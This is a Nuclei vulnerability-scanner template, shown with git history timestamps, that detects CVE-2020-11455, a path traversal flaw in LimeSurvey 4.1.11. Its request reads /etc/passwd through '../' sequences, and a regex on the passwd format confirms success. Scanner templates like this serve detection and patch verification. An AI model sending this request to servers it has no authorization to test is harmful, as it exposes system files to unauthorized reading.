my-nuclei-templates/CVE-2020-11455.yaml

35 lines
1021 B
YAML
Raw Permalink Normal View History

2021-08-05 22:54:02 +00:00
id: CVE-2020-11455
info:
name: LimeSurvey 4.1.11 - Path Traversal
author: daffainfo
2021-09-17 06:03:58 +00:00
severity: medium
2021-08-05 22:54:02 +00:00
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
2021-09-02 08:03:02 +00:00
reference:
2021-08-05 22:54:02 +00:00
- https://www.exploit-db.com/exploits/48297
- https://www.cvedetails.com/cve/CVE-2020-11455
2022-06-18 08:05:25 +00:00
- https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b
- http://packetstormsecurity.com/files/157112/LimeSurvey-4.1.11-Path-Traversal.html
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 5.3
2021-09-17 06:03:58 +00:00
cve-id: CVE-2020-11455
cwe-id: CWE-22
2022-06-18 08:05:25 +00:00
tags: cve,cve2020,lfi
2021-08-05 22:54:02 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-08-05 22:54:02 +00:00
- type: status
status:
- 200